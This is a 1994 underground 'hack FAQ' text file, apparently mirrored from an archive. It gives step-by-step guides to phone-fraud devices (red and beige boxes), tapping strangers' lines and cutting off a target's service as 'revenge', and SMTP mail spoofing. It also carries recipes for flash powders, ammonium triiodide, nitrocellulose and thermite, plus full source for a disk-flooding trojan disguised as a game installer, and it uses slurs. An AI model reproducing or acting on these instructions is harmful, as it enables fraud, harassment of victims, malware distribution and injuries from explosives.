💾 Archived View for spam.works › mirrors › textfiles › hacking › thehaq.txt captured on 2023-06-14 at 16:58:04.

View Raw

More Information

-=-=-=-=-=-=-


Jun 13, 1994 19:54 from Belisarius


 _____________
/      /     /             ***     ***      ******       ******
      /                     ***     ***    *********    *********
     /       /               ***     ***  ***     ***  ***     ***
    /       /                 ***********  ***********  ***     ***
   /       /_____    ______    ***********  ***********  ***  ** ***
  /       /     /   /_____/     ***     ***  ***     ***  ***   *****
 /       /     /   /             ***     ***  ***     ***   ***********
/       /     /   /______         ***     ***  ***     ***   *****   ***


                          +---------------+
                          |    THE HAQ    |
                          | Edition  2.07 |
                          |  11 JUN 1994  |
                          +---------------+



                 "Knowledge is power" --Francis Bacon
              "United we stand, divided we fall" --Aesop


=+=+=+=+=+=+=+=+=+= HACK-FAQ!  Non-Copyright Notice =+=+=+=+=+=+=+=+=
=                                                                   =
+      MatrixMage Publications.       1994    No rights reserved.   +
=                                                                   =
+ This file may be redistributed provided that the file and this    +
= notice remain intact. This article may not under any              =
+ circumstances be resold or redistributed for compensation of any  +
= kind.  Distribution of THE HACK-FAQ! is encouraged and promoted.  =
+                                                                   +
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=


                        <*>  Edited by  <*>


                        # Editor-in-Chief #
               Belisarius < temporary loss of E-mail >
          can be reached on ISCA, Shadow, SkyNET, Brinta and
         Baltimore 2600 Meetings and other nameless locations.


                # Asst.  Editor (non communicado) #
               Neurophire (on Shadow and N P on ISCA)


                A MatrixMage Electronic Publication


Special Thanks to the Following Contributors:
Z Maestro     RA of ISCA Underground>
DINO          RA of Shadow Hack and Crack>
Artimage      RA of SKYNET Underground>

Faunus        Revolution        Miska               Informatik
Matrixx       Amarand           Crypto Steelyhart   aBBa / PfA
Beelzebub     Redbeard          Squarewave
IO            CyberSorceror     Caustic
Doktor Nil    Skipster          Walrus
CPT Ozone     Abort             Kyoti
Carsenio      Aero              Phrack


AND NOW A WORD FROM YOUR EDITOR:

     Throughout history mankind has been afraid of the unknown.
Before lightning could be scientifically explained it was blamed on
the anger of the gods.  This belief in mysticism persisted throughout
the ages (and still does today).  Later as man acquired simple herbal
and chemical knowledge, these men were revered as mages, users of
mystical arts derived from the old gods.  But as organized religion
(i.e. Christianity especially Roman Catholicism) spread and came to
dominate society (became the powers that be), the mage was no longer
revered.  The mage (who only sought to understand the world around
himself and make the world a better place) was persecuted, attacked
and driven underground by the church.  But driving these mages
underground (out of society) did not stop there ideas from spreading
or them from continuing to work.  The church label Copernicus as a
heretic and mage and only this century has the Roman Catholic church
accepted his principles (heliocentric universe) as fact.
     So are 'hackers' the same today.  We surf the nets seeking
knowledge and information (and hopefully understanding).  Information
and understanding the meaning and import of the information are the
two greatest commodities and bases of power in the world today.
These things are easy to disseminate and gather in the electronic
world.  The matrix (cyberspace/web/net [whichever term you choose]
is able to influence and control information faster and better than
ever before.  This makes many afraid of the cyberculture (not to
mention a deep-seated techno-fear of many people, anything new and
technical is bad).
     We are a new breed of mage; seeking knowledge, desiring
understanding, persecuted by the powers that be.  This is why I have
started this publication.  We are the MatrixMages!  Our mission is
to learn and to pass on that knowledge.

                                      -=> Belisarius <=-

What is 'Cyberpunk' and the Underground?

"Every time I release a phile, or write an article for a zine, it's
vaguely like a baby.  It gets stored, and copied, and sent out all
over the world, and people read it.  It goes into their minds.
Something I created is buried in living tissue and consciousness
someplace.  Eventually somebody uses it, and I know that I have the
power to change the world.  Somewhere, someplace, somebody changed
something using information I changed or created.  I helped to
change the world."  --Unknown

That is the attitude of many of the people who, knowingly or not, are
members of this hyped/wired/cyber culture.  Some who may read this
will see some of their undefined beliefs, hopes and feelings
reflected in the above quote.  And, as the quote says, they will
help spread it.  Somewhere, somehow, that quote will change the
world.

But only if you work to change it.  Remember that information and
knowledge a powerful commodities.  He who has information cannot
be beaten.  So above all the most important thing to do in the
"Underground" is to gather information.  This means that you have to
work and put in some effort.  You don't get something' for nothing!
So work hard and together we can change the world!

Keep up with latest editions.  (Sorry there haven't been many lately
but exams and not failing out took precedence!)

The Haq, MatrixMage, THE HACK-FAQ!, Belisarius, Neurophyre,
or any contributor are not responsible for any consequences.
You use this information at your own risk.


                              CONTENTS

Sections
   I. Phone Fun
       (Red Boxing, COCOTS, Beige Boxing, Cellulars, etc.)
  II. Fake E-Mail
       (Fooling UUCP)
 III. Social Engineering
       (Free sodas, Dumpster Diving, ATMs, Carding)
  IV. The Big Bang
       (Making Weapons and Explosives)
   V. Infection
       (Virii, Trojans, Worms and other creepy crawlies)
  VI. NEWBIES READ THIS
       (Basic Hacking)
 VII. Screwing with the most widespread operating system on the net
       (UNIX / AIX Hacking)
VIII. Screwing with the most secure operating system on the net
       (VAX/VMS Hacking)
  IX. Screwing with the most widespread operating system on PCs
       (MS-DOS Hacks)
   X. Finding out what that encrypted info is
       (Cracking programs)
  XI. How do I keep my info secure
       (PGP / Cryptology)
 XII. Chemistry 101
       (explosive/pyrotechnic component prep)
XIII. Fun things with solder, wires, and parts
       (Underground electronics)
 XIV. Watching television
       (cable, Pay-Per-View(PPV), scrambling)
  XV. Tuning in to what's on the radio waves
       (Radios and Scanning)

Appendices
   A. FTP sites with useful info
   B. Interesting Gophers
   C. Informative USENET Newsgroups
   D. Publications and Zines
   E. Books
   F. Files and Papers
   G. Cataglogs
   H. PGP Keys



=====================================================================
I. Phone Fun
     (Red Boxing, COCOTS, Beige Boxing, Cellulars, etc.)

WHAT IS A RED BOX AND HOW DO I MAKE ONE?
(from Doktor Nil)

First note: a redbox is merely a device which plays the tone a
payphone makes when you insert money. You just play it through the
mike on the handset. You would think that the Phone Co. would mute
the handset until you put a quarter in, and perhaps they are starting
to build phones like that, but I have yet to see one.

What you need:
- Radio Shack 33 memory Pocket Tone Dialer
- 6.4 - 6.5536 megahertz crystal (get 6.5 MHz from Digikey, address
  below)
- A solder gun.
- Someone who can point out the crystal in the Tone
  Dialer.

Instructions:
1) Open up the back of the tone dialer. Use screwdriver.

2) Locate crystal. It should be toward the right side.
It will be smaller than the 6.5 MHz one you bought, but otherwise
vaguely similar.  It is basically capsule-shaped, with two electrodes
coming out of the bottom which are soldered onto a circuit board.
It's on the _left_ side, basically the third large crystal thing from
the bottom, about 1.5 cm long, metallic, thin.

3) De-solder, and de-attach, crystal. Heat the solder that the
crystal is seated in; remove crystal.

4) Attach 6.5 MHz crystal. It is easiest just to use the solder which
is already there from the old crystal, that way there is less chance
of you dropping hot solder somewhere it shouldn't be and losing
everything. Heat first one drop of solder with the solder gun, and
seat one electrode of the 6.4 MHz crystal in it, then do the same
with the other. This is the easiest part to mess up, be careful that
both drops of solder don't run together.

5) Put cover back on. you are done.


How to use: Five presses of the "*" key will make the quarter sound.
I think fewer presses make nickel/dime sounds, but I can't remember
specifically. Here in Michigan, you can simply hold it up to the
handset and press memory recall button 1 (where you have conveniently
recorded five *'s -read the tone dialer directions on how to do this)
and get a quarter credit, _IF_ you are calling LD. Keep making the
tone to get additional credits. There is a maximum number of credits
you can have at once.

To make a local call this may not work. You need to first put in a
real coin, then you can use the redbox for additional credits. There
may be a way around this, however: Call the operator, and ask her to
dial your number for you. She should do this without asking why, it
is a regular service. If you need an excuse, say the "4" key isn't
working, or something. She will ask you to insert your money. At
this point use the redbox. If all goes well, she dials your number
and you're in business. If she says "Will you do that one more time,"
or "Who is this," or any variations, hang up and walk away.

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

WHAT DO THESE CRYSTALS LOOK LIKE?
In most cases, a rectangular metal can with two bare wires coming out
of one end, and a number like "6.50000" stamped on one side.

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

WHAT IS THE BEST FREQUENCY FOR THE RADIO SHACK RED BOX CRYSTAL?
(from Matrixx)
6.49 is the actual EXACT crystal, 6.5 is more widely used, and 6.5536
is the easiest to find (Radio Shack)

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

WHERE CAN I GET A CRYSTAL TO MAKE THE RED BOX?
The crystals are available from Digi-Key.  Call 1-800-DIGIKEY
(1-800-344-4539) for more info.  The part order number from
DIGI-KEY is x-415-ND

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

WHAT ARE THE ACTUAL FREQUENCIES FOR REDBOX?
(from DINO)
For a Radio Shack conversion red box: a nickel is one * and a quarter
is 5 *'s

Here are the freqs for a red box:

$.25 1700 Hz & 2200 Hz for a length of 33 milliseconds for each pulse
     with 33 millisecond pause between each pulse
$.10 1700 Hz & 2200 Hz 2 pulses at 66 milliseconds and with 66
     millisecond pauses
$.05 one pulse at the above freqs for 66 milliseconds!

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

HOW DO YOU KNOW THAT THE PHONE IS A COCOT?
(from Faunus, Carsenio)
If it doesn't say "______ Bell" on it, it's probably a COCOT.  COCOT
is a general term for Customer owned or "Bell-independent" phone
companies.  Sometimes they are more shabbily constructed than real
fortress phones but others look about the same except for a lack of
phone company logo.

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

FOOLING COCOTS USING 800 NUMBERS?
You call up an 800 number as any public phone HAS too let you dial
800 numbers for free.  Then you let the person who answers the 800
number hang up on you, THEN you dial your number that you want to
call free.  OK MOST COCOTs disable the keypad on the phone so you
CANT just dial the number, you have to use a pocket tone dialer to
dial the number.

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

HOW DO I MAKE A BEIGE BOX?
(from Neurophyre)
Supplies: phone cord, soldering iron, solder, 2 INSULATED alligator
          clips, ratchet wrench, 7/16-inch hex head

 1. Cut the head off one end of the phone cord.
 2. Strip the coating back about two (2) inches.
 3. Look for the red wire, and the green wire.
 4. Mark one clip green and put it on the green.
 5. Mark the other red and put it on the red.
 6. Once you have them soldered and insulated, plug the other end
    (that still has the head) into a phone.
 7. Go out in the daytime and look for green bases, green rectangular
    things sticking about 3 feet out of the ground with a Bell logo on
    the front.  If you're a lamer, you'll waste your time with a
    cable company box or something.  I've heard of it.
 8. Come back to a secluded one at night.  With the wrench, open it
    up.
 9. Find a set of terminals (look like the threaded end of bolts
    in my area) with what should be a red wire and a green wire
    coming off them.
10. Plug in your beige box red to red and green to green, pick up the
    phone and dial away!

Modems work too as well as taps and shit.  You're using someone
else's line (unless you're an idiot) to get phone service.  Don't
abuse the same line after the phone bill comes.

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

BEIGE BOXING 101
                         Field Phreaking
                           by Revolution

     At the beginning of the section in the Bell training manual
entitled "One million ways to catch and fry a phreak" it doesn't
have a disclaimer saying "for informational purposes only".  So why
the hell should I put one here?  Give this file to whoever you want,
just make sure it all stays together, same title, same byline.

     Field phreaking gives you everything you've ever wanted: free
long distance calls, free teleconferencing, hi-tech revenge, anything
you can do from your own phone line and more, without paying for it,
or being afraid of being traced.  Just be ready to bail if you see
sirens.

How to make a beige box: Easiest box to make.  Cut your phone cord
before the jack, strip the wires a little.  You should see a red
(ring) wire and a green (tip) wire.  If you see yellow and black
wires too just ignore them.  Put one set of alligator clips on the
red wire and one on the green wire, and you're set.  (You want to
use your laptop computer, but you don't want to ruin your modem's
phone cord?  Just unscrew a jack from a wall, unscrew the 4 screws on
the back, and do the same thing as above. Now you can use a phone,
laptop, anything you can plug in a jack.)

How to use: What you have is a lineman's handset.  You can use it
from any bell switching apparatus (from now on sw. ap.).  These are
on phone poles, where your phone line meets your house, and near
payphones.  I'll go into detail below, but basically just open any
box on a telephone pole, and you'll see sets of terminals (screws),
with wires wrapped around them, just like on the back of a phone
jack.  These screws are where you need to attach your alligator
clips to get a dial tone.  Don't unscrew the screw, you'll just
fuck up some poor guys line, and increase your chances of getting
caught.  After the wire goes around the screw, it normally twists
off into the air.  Put your clip on the end of the wire.  Do the
same with the other clip.  If you don't get a dial tone, then
switch terminals.

On telephone poles:

TTI terminals: These must have been built by phreaks, just for
beige boxing.  By far the easiest sw. ap. use.  The only drawback
is that they only connect to one phone line.  These are the fist
sized gray or black boxes that appear where a single phone line
meets the mother line.  They look almost like outdoor electric
sockets, that have the snap up covering. They normally have the
letters TTI somewhere on the front.  No bolts or screws to take
off, just snap up the top and you will see four screws.  Clip in
and happy phreaking.  Just click the top down and no one will ever
know you were there (except for the extra digits on their phone
bill.)

Green trees:  just about the hardest sw. ap. to beige from (tied
with the bell canister) but if its the only one you can use, go for
it.  These are the 3 foot high green/gray metal columns that are no
wider than a telephone pole (which makes them different then the
green bases, see below), that say "Call before digging, underground
cable," or the real old ones just have a bell sign.  Usually green
trees are right at the base of phone poles, or within a foot or two
of them.  These normally have two 7/16 bolts on one side of the
column, which have to be turned 1/8 a turn counterclockwise, and
the front of the base will slide off.  Now you will see a sheet of
metal with a few square holes in it, that has a bolt where the
doorknob on a door would be.  Ratchet this one off and the metal
sheet will swing open like a door.  On one side of the sheet will
be a paper with a list of #'s this tree connects to.  Inside you'll
see a mass of wires flowing from gray stalks of plastic in sets of
two. The whole mass will have a black garbage bag around it, or
some type of covering, but that shouldn't get in the way.  The
wires come off the gray stalk, and then attach to the screws that
you can beige from, somewhere near the ground at the center of the
tree. These are on a little metal column, and sometimes are in a
zig-zag pattern, so its hard to find the terminals that match in
the right order to give you a dial tone.

Green bases: The gray/green boxes you see that look just like green
trees, except they are about twice or three times as wide.  They
open the same as trees, except there are always 4 bolts, and when
the half slides off, inside is a big metal canister held together
with like 20 bolts.  I wouldn't open it, but with a little info
from friends and some social engineering, I learned that inside is
where two underground phone lines are spliced together.  Also inside
is either pressurized gas or gel.  Pretty messy.

Bell canisters:  attached to phone poles at waist level.  They are
green (or really rusted brown) canisters about a two feet tall that
have a bell insignia on the side. They will have one or two bolts
at the very bottom of the canister, right above the base plate.
Take the bolts off and twist the canister, and it'll slide right
off.  Inside is just like a green tree, except there normally isn't
the list of #'s it connects to.

Mother load: Largest sw. ap.  A large gray green box, like 6 x 4,
attached to a telephone pole about three feet off the ground.  a big
(foot or two diameter) cable should be coming out the top.
Somewhere on it is a label "MIRROR IMAGE CABLE".  It opens like a
cabinet with double doors.  Fasteners are located in the center of
the box and on the upper edge in the center.  Both of these are
held on with a 7/16 bolt.  Take the bolts off, and swing the doors
open.  On the inside of the right door are instructions to connect
a line, and on the inside of the left door are a list of #'s the
box connects to.  And in the box are the terminals. Normally 1,000
phones (yyy-sxxx, where yyy is your exchange and s is the first
number of the suffix, and xxx are the 999 phones the box connects
too).

On houses: follow the phone line to someone's house, and then down
there wall.  Either it goes right into there house (then you're
screwed) or it ends in a plastic box.  The newer boxes have a screw
in the middle, which you can take off with your fingers, and then
put the box back on when you're done, but the older ones are just
plastic boxes you have to rip off.  Inside are 4 terminals, yellow,
black, and red and green, the two you need.  Find the Christmas
colors, and phreak out.

On payphones: follow the phone line up from the phone, and sometimes
you'll find a little black box with two screws in it.  Undo this,
and you'll find a nice little phone jack. You don't even need your
beige box for that one.  If there's not one of those, follow the
wire to a wall it goes into, and sometimes there will be a sw. ap.
like those on houses (see above).  Payphones are normally pretty
secure now though, and you probably won't find any of those.

Phreaky things you can do:  Jesus, do I have to tell you lamers
everything? Anyway, free long distance calls should be pretty easy,
and get teleconferencing info from somebody else, just make sure
you ANI the # you're calling from before calling Alliance.

Hi-tech revenge!
Possibilities are endless, you have total control of this lamers
line.  Most of you guys are probably way to elite for this one, but
you can disconnect his line by loosening a few screws and ripping
his wires at any sw. ap. but here's something a lot better:  Get the
faggots number, and then find the mother load sw. ap. it connects
to (not the sw. ap. on his house or on the telephone pole in his
drive way, the _mother_load_) Find his # in the terminals, and then
connect the two terminals with a paper clip or an alligator clip! His phone
will be busy until ma bell
figures out what the hell is going on, and since the last place
they look is the mother load, this usually is at least a week.
Then, of course, is the funniest prank:  Beige box from a major
store, like Toys R Us (that's my favorite) and call up ma bell
"Yeah, I'd like all calls to this number forwarded to (his
#)"

That's it.  Reach me as Revolution on ISCA, Cyberphunk on Shadow,
phunk on IRC, or Revolution on Delphi.  Any phreaks out there who
got new info, war stories or some addictive disorder and just need
somebody to talk to, E-mail revolution@delphi.com no PGP needed.

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

WHAT PHONE NUMBER AM I CALLING FROM?
(from Skipster, et al)

This service is called ANI.

This number may not work, but try it anyway:
(800) 825-6060

You might want to try is dialing 311 ... a recorded message tells you
your phone #.  Experiment, but 311 does work, if it doesn't and an
operator picks up, tell her that you were dialing information and
your hand must have slipped.

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

HOW DO I USE/DO ALLIANCE TELECONFERENCING?
(from Neurophire, Carsenio)
Set one of these up, it is a 1-800 dial-in conference.  Then, grab
your beige box, go to some business, preferably something like a
Wal-Mart or a Radio Shack and beige box off their line.  Then call
and set up a teleconference for whenever to be billed to the line
you are calling from.  You'll want to know specifically what to ask
for. Alliance teleconferencing is 0-700-456-1000.
Dial the number (you're of course paying for this by the minute)
and you get automated instructions on how to choose the number of
ports for your conference call, and how to dial each participant..

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

WHERE CAN I FIND VOICE MAIL BOXES TO PHREAK?
(from Token)
Just scroll through your favorite business magazine and look for
800#s.  Once you get a VMB system you can look for a box being used
and try the default passcodes <0000> , <9999> , etc.  Like on the
INet, most people are too dumb to change their passwd.  If you're
lucky you might get the root box (I did, the stupid ass's passwd
was <4321>).


=====================================================================
II. Fake E-mail
     (Fooling UUCP)

HOW DO I MAKE FAKE MAIL (OR HOW DO I FOOL UUCP)?
(from Beelzebub, Doktor Nil w/ Belisarius)

1.  Telnet to port 25 of any internet server
       (eg. telnet site.name.and.address 25)
2.  If at all possible, AVOID TYPING "HELO".
3.  Type: rcpt to (person to receive fake mail){ENTER}
4.  Type: mail from (fake name and address){ENTER}
5.  The mail server should ok each time after each name.
6.  If it does not:
     a) type vrfy and then the name of the person
     b) as a last resort use helo, this will login your computer as
        having been the source of the mail
7.  Retype the commands, it should say ok now.
8.  Type: data{ENTER}
9.  The first line of the message will be the Subject line
10.  Enter your letter
11.  To send letter type a "." on an empty line.
12. Then type quit{ENTER}
13. This is traceable by any sysadmin ... don't harass people this
    way.
14. If the person receiving the mail uses a shell like elm he/she
    will not see the telltale fake message warning
    "Apparently-To:(name)" even if not, most people wouldn't know
    what it means anyway.
15. Make sure you use a four part address somebody@part1.pt2.pt3.pt4
    so as to make it look more believable and cover any add-ons the
    mail routine might try
16. Put a realistic mail header in the mail message to throw people
    off even more.  If there are To: and Date: lines then the
    program probably won't add them on.
17. Also try to telnet to the site where the recipient has his
    account.  This works better if you know how to fool it.

=====================================================================
III. Social Engineering
     (Free sodas, Dumpster Diving, ATMs, Carding)

WHAT DOES SALTING VENDING MACHINES DO?
When you take concentrated salt water (a high concentration of salt)
and squirt it into the change slot (preferably where the dollar
bills come in, though some say it doesn't matter), the salt will
short circuit the machine and out will pour change and hopefully
sodas.

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

ANOTHER WAY OF GETTING FREE SODAS?
This is an easier and actually more reliable way of getting free
sodas.  It only wprks pn spme machines though, usually Coca-Cola.
Anyways, put in your change and as the last coin goes down the slot
start rapidly and repeatedly pressing the button of your choice.
If everything works well, then you should get two sodas and your
change back.

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

HOW ARE THE TRACKS OF ATM CARD ARRANGED?

The physical layout of the cards are standard.  The logical arrangement
of the data stored on the magnetic strip varies from institution to
institution.  There are some generally followed layouts, but not
mandatory.

There are actually up to three tracks on a card.

Track 1:
Designed for airline use.  Contains name and possibly your account
number.  This is the track that is used when the ATM greets you
by name.  There is alot of variation in how things are ordered so
occasionally you get 'Greetings Q. John Smith' or
'Greetings John Smith Q.' rather than 'Greetings John Q. Smith'.
This track is also used
with the new airline auto check in (PSA, American, etc).

Track 2:
The main operational track for online use.  The first thing
on the track is the Primary Account Number (PAN).  This is usually
pretty standard for all cards.  Some additional info might be on the
card such as expiration date.
One interesting item is the PIN (Personal Identification Number)
offset.  When an ATM verifies a PIN locally, it usually uses an
encryption scheme involving the PAN and a secret KEY.  This gives you
a "NATURAL PIN" (i.e. when they mail you your pin, this is how it got
generated).  If you want to select your own PIN, they would put the
PIN OFFSET in the clear on the card.  Just do modulo 10 arithmetic on
the Natural PIN plus the offset, and you have the selected PIN.
The PIN is never in the clear on your card.  Knowing the PIN OFFSET
will not give you the PIN.  This will require the SECRET KEY.

Track 3:
The "OFF-LINE" ATM track.  It contains information such as your daily
limit, limit left, last access, account number, and expiration date.
The ATM itself could have the ability to write to this track to
update information.

=====================================================================
IV. The Big Bang
     (Making Weapons and Explosives)

FLASH POWDERS:
(from Neurophyre)

Materials: Powdered magnesium, powdered potassium nitrate
1. Mix 1 part powdered magnesium and 4 parts of powdered potassium
   nitrate.
2. Light it with a long fuse cuz its so bright it might screw up your
   eyes.

 REAL Cherry Bomb Powder
    4 parts by weight of potassium perchlorate
        1 part by weight of antimony trisulfide
        1 part by weight aluminum powder

 Relatively Safe
    3 parts by weight of potassium permanganate
    2 parts by weight of aluminum powder


 *VERY* Shock/Friction/Static/Heat Sensitive!
 Use only if suicidal or desperate!
    4 parts by weight of potassium chlorate
        1 part by weight of sulfur
        1 part by weight of aluminum powder

1) To use these mixtures, SEPARATELY pulverize each ingredient into a
fine powder, the finer it is, the more power you get.  Use a mortar and
pestle if available, and grind GENTLY.  Do not use plastic as this can
build a static charge.  Remember, do them SEPARATELY.

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

AMATEUR EXPLOSIVE (Ammonium Triiodide):
(from IO)
WARNING:  This explosive is EXTREMELY shock sensitive when dry, and
moderately sensitive when wet!!!  AVOID IT when dry!  DO NOT store!
The purplish iodine vapor this produces during the explosion will stain
and corrode!
1) Take a small plastic bucket, add 3-4 inches of household ammonia.
   This bucket will never be clean again, in all likelihood.
   Try to get clear (non-pine, non-cloudy) ammonia.  Or use an
   ammonium hydroxide solution from a chemlab.  This results in better
   but more sensitive, and therefore dangerous crystals.
2) Drop in iodine (like you use on scratches) one drop at a time, or,
   preferably, use crystals of iodine.
3) Let it settle, then pour it through a piece of cloth, discarding
   the runoff.
4) Squeeze *gently* to get out excess liquid.
5) Mold it onto the thing you want to blow up, stand **way** back.
6) Wait for it to dry, and throw a rock at it.

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

HOW TO BUILD A TENNIS BALL CANNON?
1. Get six (6) tin cans.
2. From five of them remove the tops and bottoms.
3. From the last one remove only the top. (this is the last can to
   make the breach)
4. The cans should overlap and be fit together to make a long barrel
   closed at one end and open at the other.

                 ___________________________________
    open -->    ()____)_____)_____)_____)_____)_____)    <--closed
    (barrel)           1     2     3     4     5     6          (breach)

5. Duct tape all of the cans together.  USE LOTS OF TAPE!!
6. Put some gunpowder in the bottom of the CANnon.
7. Aim, brace the CANnon.
8. Spray hairspray or pour alcohol on the tennis ball and light.
9. Drop the ball into the can and STAND BACK!

Other ideas:
a) Make explosive tennis balls.
b) Launch potatoes.
c) Launch thumbtacks, nails, broken glass, etc.

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

HOW DO I MAKE GUNPOWDER(NITROCELLULOSE)?
(from Terrorist's Handbook)
Materials: cotton, concentrated nitric acid, concentrated sulfuric
           acid, distilled water

Equipment: two(2) 200-300mL beakers, funnel, filter paper, blue
           litmus paper

Procedure: 1.  Pour 10mL of sulfuric acid into beaker.
            2.  Pour 10mL of nitric acid into beaker with sulfuric
               acid.
           3.  Immediately add 0.5 gram of cotton.
           4.  Allow it to soak for EXACTLY three(3) minutes.
           5.  Remove the nitrocellulose.
           6.  Put the nitrocellulose into a beaker of distilled
               water to wash it in.
           7.  Allow the material to dry.
           8.  Re-wash it.
           9.  Once neutral(acid/base) it can be dried and stored.

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

WHAT IS THERMITE AND HOW DO I MAKE IT?
Thermite is a powder which burns incredibly hot (approx. 2200 deg C)
and can be used to burn through most anything.

Materials: powdered aluminum, powdered iron oxide

Procedure: mix the two powders together as evenly as possible

Ignition:  thermite is difficult to ignite but these work
            a) mix a small amount of potassium chlorate into the
               thermite mixture and ignite with a few drops of
               sulfuric acid
            b) magnesium strip or 'sparkler' stuck into the powder
               which is then lit as a fuse

=====================================================================
V. Infection
     (Virii, Trojans, Worms and other creepy crawlies)

WHERE CAN I GET SOME VIRII?
The Virus eXchange BBS in Bulgaria.  [number not available - :( ]
Problem:  They demand a virus they don't have in their archives to
let you in.  Good luck finding one.  The best way is to write one,
even if it's in BASIC. It'll probably get you in.  They have
THOUSANDS of virii.  IBM, Mac, Amiga, ... And they accept 2400 bps
from what I know! For more info, gopher to wiretap.spies.com and dig
around in their online library under technical info.

There are alot of places in the US to get virii too:
The Hell Pit in Chicago has over 1500, and they don't accept the
lame stuff like the ones written in basic, so they're all good ones.

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

INTS USED:
(from Belisarius)
You want Int 18h, AH=03h,
Al==Num sectors to write
BX==offset of pointer to buffer
CH=cylinder Number
Cl=sector number
DX=head number
Dl=drive numbers
ES=segment of pointer with buffer

for CH=it's the low 8 bits of 10 bit cylinder number,
for CL=cylinder/sector number, bits 6,7=cylinder number(high 2 bits),
                                   0-5=sector number.
for DL=bit 7 = 0 for floppy, 1 for fixed drive upon return:
AH=status, AL=number of sectors written flags, carry set if an error.

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

SAMPLE OF A TROJAN
(from Spear)

This is a little trojan I wrote in Qbasic 4.5  It's a bitch!

REM bitch by Spear
color 14,0
print"installing datafiles...  Please wait..."
print"This may take up to 20 minutes, depending on your computer..."
shell "cd\"
for a = 1 to 100000
a$=str$(a)
c$="md" + a$ + ".hee"
shell c$
next a
cls
print"Cybermattixx Version 1.0 is now installed on your system..."
print"Have a shitty day!"
print " ?AM?"
print
input "Hit ENTER To REBOOT your System now!";a$
shell "boot.com"

How to use it?
This can pose as the installation program for a game. This means that
when you upload it to a BBS or something, and post that it is a
kickass game, people will download it and try to install it on their
computers!

What does it do?
This program changes directory to the root and makes 100000 dirs in
the root.  You cannot use deltree to wipe them out in one chunk and
you CANNOT get rid of them without doing reverse engineering on the
program, ie. rd instead of md.  To get rid of them any other way you
would have to format c: or d:




 _____________
/      /     /             ***     ***      ******       ******
      /                     ***     ***    *********    *********
     /       /               ***     ***  ***     ***  ***     ***
    /       /                 ***********  ***********  ***     ***
   /       /_____    ______    ***********  ***********  ***  ** ***
  /       /     /   /_____/     ***     ***  ***     ***  ***   *****
 /       /     /   /             ***     ***  ***     ***   ***********
/       /     /   /______         ***     ***  ***     ***   *****   ***


                          +---------------+
                          |    THE HAQ    |
                          | Edition  2.07 |
                          |  11 JUN 1994  |
                          +---------------+

                             File 2 of 3

=====================================================================
VI. NEWBIES READ THIS
     (Basic Hacking)

WHAT MAKES A SYSTEM SECURE?
(from alt.security FAQ)
"The only system which is truly secure is one which is switched off
and unplugged, locked in a titanium lined safe, buried in a concrete
bunker, and is surrounded by nerve gas and very highly paid armed
guards.  Even then I wouldn't stake my life on it."
                                     - originally from Gene Spafford

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

WHAT WOULD BE IDEAL PROTECTION OF A SYSTEM?
Password Access- Get rid of simple passwords; routinely change all
                 passwords; regular review/monitoring of password
                 files

Physical Access- Lock up terminals, personal computers, disks when
                 not in use; eliminate unnecessary access lines;
                 disconnect modems when not in use

Other measures-  Know who you are talking to; shred all documents;
                 avoid public domain software; report suspicious
                 activity (especially non-working hours access)

What this all means is that hackers must now rely on the ineptitude
and laziness of the users of the system rather than the ignorance
of SysOps.  The SysOps and SecMans (Security Managers) are getting
smarter and keeping up to date.  Not only that, but they are
monitoring the hack/phreak BBSes and publications.  So the bottom
line is reveal nothing to overinquisitive newbies...they may be
working for the wrong side.

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

WHAT IS A FIREWALL?
(from the comp.security.misc FAQ)
A (Internet) firewall is a machine which is attached (usually)
between your site and a Wide Area Network (WAN).  It provides
controllable filtering of network traffic, allowing restricted
access to certain Internet port numbers and blocks access to
pretty well everything else.

